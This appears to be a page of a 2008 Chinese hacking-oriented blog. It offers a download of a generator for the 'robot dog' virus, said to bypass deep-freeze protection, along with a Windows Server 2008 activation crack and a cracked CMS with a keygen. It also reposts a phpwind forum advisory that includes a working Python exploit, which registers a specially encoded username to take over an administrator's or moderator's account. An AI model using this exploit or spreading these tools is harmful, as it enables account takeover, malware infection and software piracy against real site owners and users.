正在加载...
分页: 7/8 第一页 上页 2 3 4 5 6 7 8 下页 最后页 [ 显示模式: 摘要 | 列表 ]

机器狗生成器

[ 2008/06/06 15:20 | by selboo ]

软件作者:naitm
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

我偶然得到一个机器狗病毒的样本,于是很邪恶的做了一个生成器。
我想这东西,肯定已经有人做了生成器出来了,但是就是不肯共享出来,那就让我放一个出来吧。

注意:URL内要填的是下载文件的列表
      亲测可穿冰点


点击在新窗口中浏览此图片
下载文件 (已下载 115 次)


Tags:

      0day上已经出现了来自iND的Windows Server 2008 破解软件,据info文件显示,只要用非常简单的几个动作(禁用服务,删除文件)就可以绕过微软的软件授权验证,然后填入一个特定的注册码就可以激活Windows Server 2008.

附文件供爱好者研究之用

Tags:

文章来源:中国站长站

中国站长站讯:本站从安全组织获悉,6月4日,国内知名的社区软件 PHPWIND所有版本又现严重漏洞。黑客利用该漏洞可导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作。目前PHPWIND已经向用户紧急发出最新安全补丁,广大站长及时下载与更新补丁包,并通知身边的站长。

详情:

漏洞发布:http://www.80sec.com/

漏洞作者:jianxin@80sec.com

漏洞厂商: http://www.phpwind.com/
PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。
本漏洞影响phpwind所有版本

漏洞危害:高

漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作

利用方式:http://www.80sec.com有提供exploit

漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致在程序逻辑上判断有问题,用精心构造的数据注册用户即可获得管理权限

漏洞修补:建议关闭注册功能等待官方出补丁

漏洞状态:08.5.25发现此漏洞
08.6.1由80sec.com公开此漏洞
已发补丁

漏洞测试:


# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)


def banner():
print ""
print "########################################################"
print "Phpwind所有版本管理权限泄露漏洞利用poc"
print "Copyright (C) 2006"
print "jianxin@80sec.com"
print "80sec是一个新的致力于web安全的小团体"
print "http://www.80sec.com"

def usage():
banner()
print "Usage:n"
print " $ ./phpwind.py pwforumurl usertoattackn"
print " pwforumurl 目标论坛地址如http://www.80sec.com/"
print " usertoattack 目标拥有权限的斑竹或管理员"
print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
print " 最新版本可以使用uid登陆"
print " 其他版本可以使用cookie+useragent登陆"
print "########################################################"
print ""


argvs=sys.argv
usage()


data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")
pwurl = "%s/register.php" % argvs[1]

request = urllib2.Request(
url = pwurl ,
headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
data = data)

f=opener.open(request)
headers=f.headers.dict
cookie=headers["set-cookie"]
try:
if cookie.index('winduser'):
print "Exploit Success!"
print "Login with uid password @80sec or Cookie:"
print cookie
print "User-agent: 80sec owned this"
except:
print "Error! http://www.80sec.com"
print "Connect root#80sec.com"

PHPWind Forums 20080601 补丁发布(最后更新:20080601)
重要性等级:高!推荐广大站长及时下载与更新补丁包,并通知身边的站长。
适用范围:数据库使用 mysql 4.1 以上版本
问题描述:由MySQL一个编码Bug产生的安全隐患,威胁到网站的安全运行。


补丁发布地址http://www.phpwind.net/read-htm-tid-616824.html
Tags:

动易SP6全功能+注册机

[ 2008/06/05 14:50 | by selboo ]
动易全功能SP6

电信用户:http://down.powereasy.net/PowerEasy2006/PowerEasy_2006_SP6_Trade_2007060198763398.rar

网通用户:http://down.powereasy.net.cn/PowerEasy2006/PowerEasy_2006_SP6_Trade_2007060198763398.rar

注册机

点击在新窗口中浏览此图片

下载文件 (已下载 124 次)

你见过吗?瑞星杀毒

[ 2008/06/05 11:00 | by selboo ]

点击在新窗口中浏览此图片
分页: 7/8 第一页 上页 2 3 4 5 6 7 8 下页 最后页 [ 显示模式: 摘要 | 列表 ]